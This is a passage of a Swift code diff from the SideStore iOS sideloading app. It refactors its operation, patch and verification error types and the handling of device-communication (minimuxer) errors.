+    static func cacheClearError(errors: [String]) -> OperationError {
+        OperationError(code: .cacheClearError, failureReason: errors.joined(separator: "\n"))
+    }
+
+    static func anisetteV1Error(message: String) -> OperationError {
+        OperationError(code: .anisetteV1Error, failureReason: message)
+    }
+
+    static func anisetteV3Error(message: String) -> OperationError {
+        OperationError(code: .anisetteV3Error, failureReason: message)
+    }
+
+    static func refreshAppFailed(message: String) -> OperationError {
+        OperationError(code: .refreshAppFailed, failureReason: message)
+    }
+
+    static func invalidParameters(_ message: String? = nil) -> OperationError {
+        OperationError(code: .invalidParameters, failureReason: message)
+    }
+}
+
+
+struct OperationError: ALTLocalizedError {
+
+    let code: Code
+
+    var errorTitle: String?
+    var errorFailure: String?
+
+    var appName: String?
+
+    var requiredAppIDs: Int?
+    var availableAppIDs: Int?
+    var expirationDate: Date?
+
+    var sourceFile: String?
+    var sourceLine: UInt?
+
+    private var _failureReason: String?
+
+    private init(code: Code, failureReason: String? = nil,
+                 appName: String? = nil, requiredAppIDs: Int? = nil, availableAppIDs: Int? = nil,
+                 expirationDate: Date? = nil, sourceFile: String? = nil, sourceLine: UInt? = nil){
+        self.code = code
+        self._failureReason = failureReason
+
+        self.appName = appName
+        self.requiredAppIDs = requiredAppIDs
+        self.availableAppIDs = availableAppIDs
+        self.expirationDate = expirationDate
+        self.sourceFile = sourceFile
+        self.sourceLine = sourceLine
+    }
+
+    var errorFailureReason: String {
+        switch self.code {
+        case .unknown:
+            var failureReason = self._failureReason ?? NSLocalizedString("An unknown error occurred.", comment: "")
+            guard let sourceFile, let sourceLine else { return failureReason }
+            failureReason += " (\(sourceFile) line \(sourceLine)"
+            return failureReason
         case .unknownResult: return NSLocalizedString("The operation returned an unknown result.", comment: "")
         case .cancelled: return NSLocalizedString("The operation was cancelled.", comment: "")
         case .timedOut: return NSLocalizedString("The operation timed out.", comment: "")
         case .notAuthenticated: return NSLocalizedString("You are not signed in.", comment: "")
-        case .appNotFound: return NSLocalizedString("App not found.", comment: "")
-        case .unknownUDID: return NSLocalizedString("Unknown device UDID.", comment: "")
-        case .invalidApp: return NSLocalizedString("The app is invalid.", comment: "")
-        case .invalidParameters: return NSLocalizedString("Invalid parameters.", comment: "")
+        case .unknownUDID: return NSLocalizedString("SideStore could not determine this device's UDID.", comment: "")
+        case .invalidApp: return NSLocalizedString("The app is in an invalid format.", comment: "")
+        case .maximumAppIDLimitReached: return NSLocalizedString("Cannot register more than 10 App IDs within a 7 day period.", comment: "")
         case .noSources: return NSLocalizedString("There are no SideStore sources.", comment: "")
-        case .openAppFailed(let name): return String(format: NSLocalizedString("SideStore was denied permission to launch %@.", comment: ""), name)
-        case .missingAppGroup: return NSLocalizedString("SideStore's shared app group could not be found.", comment: "")
-        case .maximumAppIDLimitReached: return NSLocalizedString("Cannot register more than 10 App IDs.", comment: "")
-        case .noDevice: return NSLocalizedString("Cannot fetch the device from the muxer", comment: "")
-        case .createService(let name): return String(format: NSLocalizedString("Cannot start a %@ server on the device.", comment: ""), name)
-        case .getFromDevice(let name): return String(format: NSLocalizedString("Cannot fetch %@ from the device.", comment: ""), name)
-        case .setArgument(let name): return String(format: NSLocalizedString("Cannot set %@ on the device.", comment: ""), name)
-        case .afc: return NSLocalizedString("AFC was unable to manage files on the device", comment: "")
-        case .install: return NSLocalizedString("Unable to install the app from the staging directory", comment: "")
-        case .uninstall: return NSLocalizedString("Unable to uninstall the app", comment: "")
-        case .lookupApps: return NSLocalizedString("Unable to fetch apps from the device", comment: "")
-        case .detach: return NSLocalizedString("Unable to detach from the app's process", comment: "")
-        case .functionArguments: return NSLocalizedString("A function was passed invalid arguments", comment: "")
-        case .profileInstall: return NSLocalizedString("Unable to manage profiles on the device", comment: "")
-        case .noConnection: return NSLocalizedString("Unable to connect to the device, make sure Wireguard is enabled and you're connected to WiFi", comment: "")
-        case .cowExploitNoFDA: return NSLocalizedString("Unable to get Full Disk Access using exploit.", comment: "")
-        case .cowExploitFailedPatchd: return NSLocalizedString("Unable to patch installd using exploit.", comment: "")
+        case .missingAppGroup: return NSLocalizedString("SideStore's shared app group could not be accessed.", comment: "")
+        case .appNotFound:
+            let appName = self.appName ?? NSLocalizedString("The app", comment: "")
+            return String(format: NSLocalizedString("%@ could not be found.", comment: ""), appName)
+        case .openAppFailed:
+            let appName = self.appName ?? NSLocalizedString("The app", comment: "")
+            return String(format: NSLocalizedString("SideStore was denied permission to launch %@.", comment: ""), appName)
+        case .noWiFi: return NSLocalizedString("You do not appear to be connected to WiFi and/or the WireGuard VPN!\nSideStore will never be able to install or refresh applications without WiFi and the WireGuard VPN.", comment: "")
+        case .tooNewError: return NSLocalizedString("iOS 17 has changed how JIT is enabled therefore SideStore cannot enable it without SideJITServer at this time, sorry for any inconvenience.\nWe will let everyone know once we have a solution!", comment: "")
+        case .unableToConnectSideJIT: return NSLocalizedString("Unable to connect to SideJITServer Please check that you are on the Same Wi-Fi and your Firewall has been set correctly", comment: "")
+        case .unableToRespondSideJITDevice: return NSLocalizedString("SideJITServer is unable to connect to your iDevice Please make sure you have paired your Device by doing 'SideJITServer -y' or try Refreshing SideJITServer from Settings", comment: "")
+        case .wrongSideJITIP: return NSLocalizedString("Incorrect SideJITServer IP Please make sure that you are on the Samw Wifi as SideJITServer", comment: "")
+        case .refreshsidejit: return NSLocalizedString("Unable to find App Please try Refreshing SideJITServer from Settings", comment: "")
+        case .anisetteV1Error: return NSLocalizedString("An error occurred when getting anisette data from a V1 server: %@. Try using another anisette server.", comment: "")
+        case .provisioningError: return NSLocalizedString("An error occurred when provisioning: %@ %@. Please try again. If the issue persists, report it on GitHub Issues!", comment: "")
+        case .anisetteV3Error: return NSLocalizedString("An error occurred when getting anisette data from a V3 server: %@. Please try again. If the issue persists, report it on GitHub Issues!", comment: "")
+        case .cacheClearError: return NSLocalizedString("An error occurred while clearing cache: %@", comment: "")
+        case .SideJITIssue: return NSLocalizedString("An error occurred while using SideJIT: %@", comment: "")
+            
+        case .refreshAppFailed:
+            let message = self._failureReason ?? ""
+            return String(format: NSLocalizedString("Unable to refresh App\n%@", comment: ""), message)
+
+        case .invalidParameters:
+            let message = self._failureReason.map { ": \n\($0)" } ?? "."
+            return String(format: NSLocalizedString("Invalid parameters%@", comment: ""), message)
         }
+        
     }
     
     var recoverySuggestion: String? {
-        switch self {
-        case .maximumAppIDLimitReached(let application, let requiredAppIDs, let availableAppIDs, let date):
+        switch self.code
+        {
+        case .noWiFi: return NSLocalizedString("Make sure the VPN is toggled on and you are connected to any WiFi network!", comment: "")
+        case .maximumAppIDLimitReached:
             let baseMessage = NSLocalizedString("Delete sideloaded apps to free up App ID slots.", comment: "")
-            let message: String
-            
-            if requiredAppIDs > 1 {
+            guard let appName, let requiredAppIDs, let availableAppIDs, let expirationDate else { return baseMessage }
+            var message: String
+
+            if requiredAppIDs > 1
+            {
                 let availableText: String
                 
-                switch availableAppIDs {
+                switch availableAppIDs
+                {
                 case 0: availableText = NSLocalizedString("none are available", comment: "")
                 case 1: availableText = NSLocalizedString("only 1 is available", comment: "")
                 default: availableText = String(format: NSLocalizedString("only %@ are available", comment: ""), NSNumber(value: availableAppIDs))
                 }
                 
-                let prefixMessage = String(format: NSLocalizedString("%@ requires %@ App IDs, but %@.", comment: ""), application.name, NSNumber(value: requiredAppIDs), availableText)
-                message = prefixMessage + " " + baseMessage
+                let prefixMessage = String(format: NSLocalizedString("%@ requires %@ App IDs, but %@.", comment: ""), appName, NSNumber(value: requiredAppIDs), availableText)
+                message = prefixMessage + " " + baseMessage + "\n\n"
             }
-            else {
-                let dateComponents = Calendar.current.dateComponents([.day, .hour, .minute], from: Date(), to: date)
-                
-                let dateComponentsFormatter = DateComponentsFormatter()
-                dateComponentsFormatter.maximumUnitCount = 1
-                dateComponentsFormatter.unitsStyle = .full
-                
-                let remainingTime = dateComponentsFormatter.string(from: dateComponents)!
-                
-                let remainingTimeMessage = String(format: NSLocalizedString("You can register another App ID in %@.", comment: ""), remainingTime)
-                message = baseMessage + " " + remainingTimeMessage
+            else
+            {
+                message = baseMessage + " "
             }
-            
+
+            let dateComponents = Calendar.current.dateComponents([.day, .hour, .minute], from: Date(), to: expirationDate)
+            let dateFormatter = DateComponentsFormatter()
+            dateFormatter.maximumUnitCount = 1
+            dateFormatter.unitsStyle = .full
+
+            let remainingTime = dateFormatter.string(from: dateComponents)!
+
+            message += String(format: NSLocalizedString("You can register another App ID in %@.", comment: ""), remainingTime)
+
             return message
             
         default: return nil
@@ -117,49 +239,66 @@ enum OperationError: LocalizedError {
     }
 }
 
-func minimuxer_to_operation(code: Int32) -> OperationError {
-    switch code {
-    case 1:
-        return OperationError.noDevice
-    case 2:
-        return OperationError.createService(name: "debug")
-    case 3:
-        return OperationError.createService(name: "instproxy")
-    case 4:
-        return OperationError.getFromDevice(name: "installed apps")
-    case 5:
-        return OperationError.getFromDevice(name: "path to the app")
-    case 6:
-        return OperationError.getFromDevice(name: "bundle path")
-    case 7:
-        return OperationError.setArgument(name: "max packet")
-    case 8:
-        return OperationError.setArgument(name: "working directory")
-    case 9:
-        return OperationError.setArgument(name: "argv")
-    case 10:
-        return OperationError.getFromDevice(name: "launch success")
-    case 11:
-        return OperationError.detach
-    case 12:
-        return OperationError.functionArguments
-    case 13:
-        return OperationError.createService(name: "AFC")
-    case 14:
-        return OperationError.afc
-    case 15:
-        return OperationError.install
-    case 16:
-        return OperationError.uninstall
-    case 17:
-        return OperationError.createService(name: "misagent")
-    case 18:
-        return OperationError.profileInstall
-    case 19:
-        return OperationError.profileInstall
-    case 20:
-        return OperationError.noConnection
-    default:
-        return OperationError.unknown
+extension MinimuxerError: LocalizedError {
+    public var failureReason: String? {
+        switch self {
+        case .NoDevice:
+            return NSLocalizedString("Cannot fetch the device from the muxer", comment: "")
+        case .NoConnection:
+            return NSLocalizedString("Unable to connect to the device, make sure Wireguard is enabled and you're connected to WiFi. This could mean an invalid pairing.", comment: "")
+        case .PairingFile:
+            return NSLocalizedString("Invalid pairing file. Your pairing file either didn't have a UDID, or it wasn't a valid plist. Please use jitterbugpair to generate it", comment: "")
+            
+        case .CreateDebug:
+            return self.createService(name: "debug")
+        case .LookupApps:
+            return self.getFromDevice(name: "installed apps")
+        case .FindApp:
+            return self.getFromDevice(name: "path to the app")
+        case .BundlePath:
+            return self.getFromDevice(name: "bundle path")
+        case .MaxPacket:
+            return self.setArgument(name: "max packet")
+        case .WorkingDirectory:
+            return self.setArgument(name: "working directory")
+        case .Argv:
+            return self.setArgument(name: "argv")
+        case .LaunchSuccess:
+            return self.getFromDevice(name: "launch success")
+        case .Detach:
+            return NSLocalizedString("Unable to detach from the app's process", comment: "")
+        case .Attach:
+            return NSLocalizedString("Unable to attach to the app's process", comment: "")
+            
+        case .CreateInstproxy:
+            return self.createService(name: "instproxy")
+        case .CreateAfc:
+            return self.createService(name: "AFC")
+        case .RwAfc:
+            return NSLocalizedString("AFC was unable to manage files on the device. This usually means an invalid pairing.", comment: "")
+        case .InstallApp(let message):
+            return NSLocalizedString("Unable to install the app: \(message.toString())", comment: "")
+        case .UninstallApp:
+            return NSLocalizedString("Unable to uninstall the app", comment: "")
+
+        case .CreateMisagent:
+            return self.createService(name: "misagent")
+        case .ProfileInstall:
+            return NSLocalizedString("Unable to manage profiles on the device", comment: "")
+        case .ProfileRemove:
+            return NSLocalizedString("Unable to manage profiles on the device", comment: "")
+        }
+    }
+    
+    fileprivate func createService(name: String) -> String {
+        return String(format: NSLocalizedString("Cannot start a %@ server on the device.", comment: ""), name)
+    }
+    
+    fileprivate func getFromDevice(name: String) -> String {
+        return String(format: NSLocalizedString("Cannot fetch %@ from the device.", comment: ""), name)
+    }
+    
+    fileprivate func setArgument(name: String) -> String {
+        return String(format: NSLocalizedString("Cannot set %@ on the device.", comment: ""), name)
     }
 }

AltStore/Operations/Patch App/PatchAppOperation.swift

@@ -25,22 +25,38 @@ protocol PatchAppContext
     var error: Error? { get }
 }
 
-enum PatchAppError: LocalizedError
+extension PatchAppError
 {
-    case unsupportedOperatingSystemVersion(OperatingSystemVersion)
-    
-    var errorDescription: String? {
-        switch self
-        {
-        case .unsupportedOperatingSystemVersion(let osVersion):
-            var osVersionString = "\(osVersion.majorVersion).\(osVersion.minorVersion)"
-            if osVersion.patchVersion != 0
-            {
-                osVersionString += ".\(osVersion.patchVersion)"
+    enum Code: Int, ALTErrorCode, CaseIterable {
+        typealias Error = PatchAppError
+
+        case unsupportedOperatingSystemVersion
+    }
+
+    static func unsupportedOperatingSystemVersion(_ osVersion: OperatingSystemVersion) -> PatchAppError {
+        PatchAppError(code: .unsupportedOperatingSystemVersion, osVersion: osVersion)
+    }
+}
+
+struct PatchAppError: ALTLocalizedError {
+    let code: Code
+
+    var errorTitle: String?
+    var errorFailure: String?
+
+    var osVersion: OperatingSystemVersion?
+
+    var errorFailureReason: String {
+        switch self.code {
+        case .unsupportedOperatingSystemVersion:
+            let osVersionString: String
+
+            if let osVersion = self.osVersion?.stringValue {
+                osVersionString = NSLocalizedString("iOS", comment: "") + " " + osVersion
+            } else {
+                osVersionString = NSLocalizedString("your device's iOS version", comment: "")
             }
-            
-            let errorDescription = String(format: NSLocalizedString("The OTA download URL for iOS %@ could not be determined.", comment: ""), osVersionString)
-            return errorDescription
+            return String(format: NSLocalizedString("The OTA download URL for %@ could not be determined.", comment: ""), osVersionString)
         }
     }
 }
@@ -82,7 +98,9 @@ final class PatchAppOperation: ResultOperation<Void>
             return
         }
         
-        guard let resignedApp = self.context.resignedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
+        guard let resignedApp = self.context.resignedApp else {
+            return self.finish(.failure(OperationError.invalidParameters("PatchAppOperation.main: self.context.resignedApp is nil")))
+        }
         
         self.progressHandler?(self.progress, NSLocalizedString("Downloading iOS firmware...", comment: ""))
                 

AltStore/Operations/Patch App/PatchViewController.swift

@@ -439,7 +439,7 @@ private extension PatchViewController
                             
                             do
                             {
-                                guard let (bundleIdentifier, result) = results.first else { throw refreshGroup?.context.error ?? OperationError.unknown }
+                                guard let (bundleIdentifier, result) = results.first else { throw refreshGroup?.context.error ?? OperationError.unknown() }
                                 _ = try result.get()
                                 
                                 if var patchedApps = UserDefaults.standard.patchedApps, let index = patchedApps.firstIndex(of: bundleIdentifier)

AltStore/Operations/RefreshAppOperation.swift

@@ -35,34 +35,33 @@ final class RefreshAppOperation: ResultOperation<InstalledApp>
         
         do
         {
-            if let error = self.context.error
-            {
-                throw error
+            if let error = self.context.error {
+                print("RefreshAppOperation.main: ERROR: self.context.app = \(self.context.app!); self.context.error is \(error)")
+                return self.finish(.failure(error))
             }
             
-            guard let profiles = self.context.provisioningProfiles else { throw OperationError.invalidParameters }
+            guard let profiles = self.context.provisioningProfiles else {
+                return self.finish(.failure(OperationError.invalidParameters("RefreshAppOperation.main: self.context.provisioningProfiles is nil")))
+            }
             
-            guard let app = self.context.app else { throw OperationError.appNotFound }
-            
-            DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
-                print("Sending refresh app request...")
+            guard let app = self.context.app else { return self.finish(.failure(OperationError(.appNotFound(name: nil)))) }
 
-                for p in profiles {
-                    do {
-                        let x = try install_provisioning_profile(plist: p.value.data)
-                        if case .Bad(let code) = x {
-                            self.finish(.failure(minimuxer_to_operation(code: code)))
-                        }
-                    } catch Uhoh.Bad(let code) {
-                        self.finish(.failure(minimuxer_to_operation(code: code)))
-                    } catch {
-                        self.finish(.failure(OperationError.unknown))
-                    }
+            for p in profiles {
+                do {
+                    let bytes = p.value.data.toRustByteSlice()
+                    try install_provisioning_profile(bytes.forRust())
+                } catch {
+                    self.finish(.failure(MinimuxerError.ProfileInstall))
+                }
+
+                DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
+                    
                     self.progress.completedUnitCount += 1
                     
                     let predicate = NSPredicate(format: "%K == %@", #keyPath(InstalledApp.bundleIdentifier), app.bundleIdentifier)
                     self.managedObjectContext.perform {
                         guard let installedApp = InstalledApp.first(satisfying: predicate, in: self.managedObjectContext) else {
+                            self.finish(.failure(OperationError(.appNotFound(name: app.name))))
                             return
                         }
                         installedApp.update(provisioningProfile: p.value)
@@ -75,9 +74,5 @@ final class RefreshAppOperation: ResultOperation<InstalledApp>
                 }
             }
         }
-        catch
-        {
-            self.finish(.failure(error))
-        }
     }
 }

AltStore/Operations/RemoveAppBackupOperation.swift

@@ -35,7 +35,9 @@ final class RemoveAppBackupOperation: ResultOperation<Void>
             return
         }
         
-        guard let installedApp = self.context.installedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
+        guard let installedApp = self.context.installedApp else {
+            return self.finish(.failure(OperationError.invalidParameters("RemoveAppBackupOperation.main: self.context.installedApp is nil")))
+        }
         installedApp.managedObjectContext?.perform {
             guard let backupDirectoryURL = FileManager.default.backupDirectoryURL(for: installedApp) else { return self.finish(.failure(OperationError.missingAppGroup)) }
             

AltStore/Operations/RemoveAppOperation.swift

@@ -33,21 +33,19 @@ final class RemoveAppOperation: ResultOperation<InstalledApp>
             return
         }
         
-        guard let installedApp = self.context.installedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
+        guard let installedApp = self.context.installedApp else {
+            return self.finish(.failure(OperationError.invalidParameters("RemoveAppOperation.main: self.context.installedApp is nil")))
+        }
         
         installedApp.managedObjectContext?.perform {
             let resignedBundleIdentifier = installedApp.resignedBundleIdentifier
             
             do {
-                let res = try remove_app(app_id: resignedBundleIdentifier)
-                if case Uhoh.Bad(let code) = res {
-                    self.finish(.failure(minimuxer_to_operation(code: code)))
-                }
-            } catch Uhoh.Bad(let code) {
-                self.finish(.failure(minimuxer_to_operation(code: code)))
+                try remove_app(resignedBundleIdentifier)
             } catch {
-                self.finish(.failure(ALTServerError(.appDeletionFailed)))
+                return self.finish(.failure(error))
             }
+            
             DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
                 self.progress.completedUnitCount += 1
                 

AltStore/Operations/ResignAppOperation.swift

@@ -11,6 +11,7 @@ import Roxas
 
 import AltStoreCore
 import AltSign
+import minimuxer
 
 @objc(ResignAppOperation)
 final class ResignAppOperation: ResultOperation<ALTApplication>
@@ -41,7 +42,12 @@ final class ResignAppOperation: ResultOperation<ALTApplication>
             let profiles = self.context.provisioningProfiles,
             let team = self.context.team,
             let certificate = self.context.certificate
-        else { return self.finish(.failure(OperationError.invalidParameters)) }
+        else {
+            return self.finish(.failure(OperationError.invalidParameters("ResignAppOperation.main: " +
+                                                                         "self.context.team or " +
+                                                                         "self.context.provisioningProfiles or" +
+                                                                         "self.context.certificate is nil")))
+        }
         
         // Prepare app bundle
         let prepareAppProgress = Progress.discreteProgress(totalUnitCount: 2)
@@ -61,6 +67,7 @@ final class ResignAppOperation: ResultOperation<ALTApplication>
                 {
                     let destinationURL = InstalledApp.refreshedIPAURL(for: app)
                     try FileManager.default.copyItem(at: resignedURL, to: destinationURL, shouldReplace: true)
+                    print("Successfully resigned app to \(destinationURL.absoluteString)")
                     
                     // Use appBundleURL since we need an app bundle, not .ipa.
                     guard let resignedApplication = ALTApplication(fileURL: appBundleURL) else { throw OperationError.invalidApp }
@@ -114,7 +121,9 @@ private extension ResignAppOperation
             
             infoDictionary[kCFBundleIdentifierKey as String] = profile.bundleIdentifier
             infoDictionary[Bundle.Info.altBundleID] = identifier
-            infoDictionary[Bundle.Info.devicePairingString] = Bundle.main.object(forInfoDictionaryKey: "ALTPairingFile") as? String
+            infoDictionary[Bundle.Info.devicePairingString] = "<insert pairing file here>"
+            infoDictionary.removeValue(forKey: "DTXcode")
+            infoDictionary.removeValue(forKey: "DTXcodeBuild")
 
             for (key, value) in additionalInfoDictionaryValues
             {
@@ -147,6 +156,14 @@ private extension ResignAppOperation
             infoDictionary[Bundle.Info.exportedUTIs] = exportedUTIs
             
             try (infoDictionary as NSDictionary).write(to: bundle.infoPlistURL)
+            
+            // Remove _CodeSignature folder (if it exists) because it will be added when resigning and it may have files that aren't overwritten when resigning
+            // These files might be the cause of some ApplicationVerificationFailed errors
+            let codeSignaturePath = bundle.bundleURL.appendingPathComponent("_CodeSignature").absoluteString.replacingOccurrences(of: "file://", with: "")
+            if FileManager.default.fileExists(atPath: codeSignaturePath) {
+                try FileManager.default.removeItem(atPath: codeSignaturePath)
+                print("Removed _CodeSignature folder at \(codeSignaturePath)")
+            }
         }
         
         DispatchQueue.global().async {
@@ -172,9 +189,9 @@ private extension ResignAppOperation
 
                 if app.isAltStoreApp
                 {
-                    guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String else { throw OperationError.unknownUDID }
+                    guard let udid = fetch_udid()?.toString() as? String else { throw OperationError.unknownUDID }
                     guard let pairingFileString = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.devicePairingString) as? String else { throw OperationError.unknownUDID }                    
-                    additionalValues[Bundle.Info.devicePairingString] = pairingFileString
+                    additionalValues[Bundle.Info.devicePairingString] = "<insert pairing file here>"
                     additionalValues[Bundle.Info.deviceID] = udid
                     additionalValues[Bundle.Info.serverID] = UserDefaults.standard.preferredServerID
                     
@@ -193,7 +210,7 @@ private extension ResignAppOperation
                         // The embedded certificate + certificate identifier are already in app bundle, no need to update them.
                     }
                 }
-                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String
+                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = fetch_udid()?.toString() as? String
                 {
                     // There is an ALTDeviceID entry, so assume the app is using AltKit and replace it with the device's UDID.
                     additionalValues[Bundle.Info.deviceID] = udid
@@ -218,6 +235,7 @@ private extension ResignAppOperation
                 
                 // Prepare app
                 try prepare(appBundle, additionalInfoDictionaryValues: additionalValues)
+                try self.removeMissingAppExtensionReferences(from: appBundle)
                 
                 if let directory = appBundle.builtInPlugInsURL, let enumerator = FileManager.default.enumerator(at: directory, includingPropertiesForKeys: nil, options: [.skipsSubdirectoryDescendants])
                 {
@@ -258,4 +276,28 @@ private extension ResignAppOperation
         
         return progress
     }
+    
+    func removeMissingAppExtensionReferences(from bundle: Bundle) throws
+    {
+        // If app extensions have been removed from an app (either by AltStore or the developer),
+        // we must remove all references to them from SC_Info/Manifest.plist (if it exists).
+        
+        let scInfoURL = bundle.bundleURL.appendingPathComponent("SC_Info")
+        let manifestPlistURL = scInfoURL.appendingPathComponent("Manifest.plist")
+        
+        guard let manifestPlist = NSMutableDictionary(contentsOf: manifestPlistURL), let sinfReplicationPaths = manifestPlist["SinfReplicationPaths"] as? [String] else { return }
+        
+        // Remove references to missing files.
+        let filteredReplicationPaths = sinfReplicationPaths.filter { path in
+            guard let fileURL = URL(string: path, relativeTo: bundle.bundleURL) else { return false }
+            
+            let fileExists = FileManager.default.fileExists(atPath: fileURL.path)
+            return fileExists
+        }
+        
+        manifestPlist["SinfReplicationPaths"] = filteredReplicationPaths
+        
+        // Save updated Manifest.plist to disk.
+        try manifestPlist.write(to: manifestPlistURL)
+    }
 }

AltStore/Operations/SendAppOperation.swift

@@ -9,6 +9,7 @@ import Foundation
 import Network
 
 import AltStoreCore
+import minimuxer
 
 @objc(SendAppOperation)
 final class SendAppOperation: ResultOperation<()>
@@ -32,11 +33,12 @@ final class SendAppOperation: ResultOperation<()>
         
         if let error = self.context.error
         {
-            self.finish(.failure(error))
-            return
+            return self.finish(.failure(error))
         }
         
-        guard let resignedApp = self.context.resignedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
+        guard let resignedApp = self.context.resignedApp else {
+            return self.finish(.failure(OperationError.invalidParameters("SendAppOperation.main: self.resignedApp is nil")))
+        }
         
         // self.context.resignedApp.fileURL points to the app bundle, but we want the .ipa.
         let app = AnyApp(name: resignedApp.name, bundleIdentifier: self.context.bundleIdentifier, url: resignedApp.fileURL)
@@ -44,25 +46,20 @@ final class SendAppOperation: ResultOperation<()>
         
         print("AFC App `fileURL`: \(fileURL.absoluteString)")
         
-        let ns_bundle = NSString(string: app.bundleIdentifier)
-        let ns_bundle_ptr = UnsafeMutablePointer<CChar>(mutating: ns_bundle.utf8String)
-
         if let data = NSData(contentsOf: fileURL) {
-            let pls = UnsafeMutablePointer<UInt8>.allocate(capacity: data.length)
-            for (index, data) in data.enumerated() {
-                pls[index] = data
-            }
-            let res = minimuxer_yeet_app_afc(ns_bundle_ptr, pls, UInt(data.length))
-            if res == 0 {
-                print("minimuxer_yeet_app_afc `res` == \(res)")
+            do {
+                let bytes = Data(data).toRustByteSlice()
+                try yeet_app_afc(app.bundleIdentifier, bytes.forRust())
+                self.progress.completedUnitCount += 1
+                self.finish(.success(()))
+            } catch {
+                self.finish(.failure(MinimuxerError.RwAfc))
                 self.progress.completedUnitCount += 1
                 self.finish(.success(()))
-            } else {
-                self.finish(.failure(minimuxer_to_operation(code: res)))
             }
-            
         } else {
-            self.finish(.failure(ALTServerError(.underlyingError)))
+            print("IPA doesn't exist????")
+            self.finish(.failure(OperationError(.appNotFound(name: resignedApp.name))))
         }
     }
 }

AltStore/Operations/VerifyAppOperation.swift

@@ -8,48 +8,87 @@
 
 import Foundation
 
+import AltStoreCore
 import AltSign
 import Roxas
 
-enum VerificationError: ALTLocalizedError
+extension VerificationError
 {
-    case privateEntitlements(ALTApplication, entitlements: [String: Any])
-    case mismatchedBundleIdentifiers(ALTApplication, sourceBundleID: String)
-    case iOSVersionNotSupported(ALTApplication)
+    enum Code: Int, ALTErrorCode, CaseIterable {
+        typealias Error = VerificationError
+
+        case privateEntitlements
+        case mismatchedBundleIdentifiers
+        case iOSVersionNotSupported
+    }
+
+    static func privateEntitlements(_ entitlements: [String: Any], app: ALTApplication) -> VerificationError {
+        VerificationError(code: .privateEntitlements, app: app, entitlements: entitlements)
+    }
+
+    static func mismatchedBundleIdentifiers(sourceBundleID: String, app: ALTApplication) -> VerificationError {
+        VerificationError(code: .mismatchedBundleIdentifiers, app: app, sourceBundleID: sourceBundleID)
+    }
+
+    static func iOSVersionNotSupported(app: AppProtocol, osVersion: OperatingSystemVersion = ProcessInfo.processInfo.operatingSystemVersion, requiredOSVersion: OperatingSystemVersion?) -> VerificationError {
+        VerificationError(code: .iOSVersionNotSupported, app: app)
+    }
+}
+
+struct VerificationError: ALTLocalizedError {
+    let code: Code
+
+    var errorTitle: String?
+    var errorFailure: String?
+
+    @Managed var app: AppProtocol?
+    var entitlements: [String: Any]?
+    var sourceBundleID: String?
+    var deviceOSVersion: OperatingSystemVersion?
+    var requiredOSVersion: OperatingSystemVersion?
     
-    var app: ALTApplication {
-        switch self
-        {
-        case .privateEntitlements(let app, _): return app
-        case .mismatchedBundleIdentifiers(let app, _): return app
-        case .iOSVersionNotSupported(let app): return app
+    var errorDescription: String? {
+        switch self.code {
+        case .iOSVersionNotSupported:
+            guard let deviceOSVersion else { return nil }
+
+            var failureReason = self.errorFailureReason
+            if self.app == nil {
+                let firstLetter = failureReason.prefix(1).lowercased()
+                failureReason = firstLetter + failureReason.dropFirst()
+            }
+
+            return String(formatted: "This device is running iOS %@, but %@", deviceOSVersion.stringValue, failureReason)
+        default: return nil
         }
     }
-    
-    var failure: String? {
-        return String(format: NSLocalizedString("“%@” could not be installed.", comment: ""), app.name)
-    }
-    
-    var failureReason: String? {
-        switch self
+
+    var errorFailureReason: String {
+        switch self.code
         {
-        case .privateEntitlements(let app, _):
-            return String(format: NSLocalizedString("“%@” requires private permissions.", comment: ""), app.name)
-            
-        case .mismatchedBundleIdentifiers(let app, let sourceBundleID):
-            return String(format: NSLocalizedString("The bundle ID “%@” does not match the one specified by the source (“%@”).", comment: ""), app.bundleIdentifier, sourceBundleID)
-            
-        case .iOSVersionNotSupported(let app):
-            let name = app.name
-            
-            var version = "iOS \(app.minimumiOSVersion.majorVersion).\(app.minimumiOSVersion.minorVersion)"
-            if app.minimumiOSVersion.patchVersion > 0
-            {
-                version += ".\(app.minimumiOSVersion.patchVersion)"
+        case .privateEntitlements:
+            let appName = self.$app.name ?? NSLocalizedString("The app", comment: "")
+            return String(formatted: "“%@” requires private permissions.", appName)
+
+        case .mismatchedBundleIdentifiers:
+            if let appBundleID = self.$app.bundleIdentifier, let bundleID = self.sourceBundleID {
+                return String(formatted: "The bundle ID '%@' does not match the one specified by the source ('%@').", appBundleID, bundleID)
+            } else {
+                return NSLocalizedString("The bundle ID does not match the one specified by the source.", comment: "")
+            }
+
+        case .iOSVersionNotSupported:
+            let appName = self.$app.name ?? NSLocalizedString("The app", comment: "")
+            let deviceOSVersion = self.deviceOSVersion ?? ProcessInfo.processInfo.operatingSystemVersion
+
+            guard let requiredOSVersion else {
+                return String(formatted: "%@ does not support iOS %@.", appName, deviceOSVersion.stringValue)
+            }
+            if deviceOSVersion > requiredOSVersion {
+                return String(formatted: "%@ requires iOS %@ or earlier", appName, requiredOSVersion.stringValue)
+            } else {
+                return String(formatted: "%@ requires iOS %@ or later", appName, requiredOSVersion.stringValue)
             }
-            
-            let localizedDescription = String(format: NSLocalizedString("%@ requires %@.", comment: ""), name, version)
-            return localizedDescription
         }
     }
 }
@@ -77,15 +116,21 @@ final class VerifyAppOperation: ResultOperation<Void>
             {
                 throw error
             }
+            let appName = self.context.app?.name ?? NSLocalizedString("The app", comment: "")
+            self.localizedFailure = String(format: NSLocalizedString("%@ could not be installed.", comment: ""), appName)
             
-            guard let app = self.context.app else { throw OperationError.invalidParameters }
+            guard let app = self.context.app else {
+                throw OperationError.invalidParameters("VerifyAppOperation.main: self.context.app is nil")
+            }
             
-            guard app.bundleIdentifier == self.context.bundleIdentifier else {
-                throw VerificationError.mismatchedBundleIdentifiers(app, sourceBundleID: self.context.bundleIdentifier)
+            if !["ny.litritt.ignited", "com.litritt.ignited"].contains(where: { $0 == app.bundleIdentifier }) {
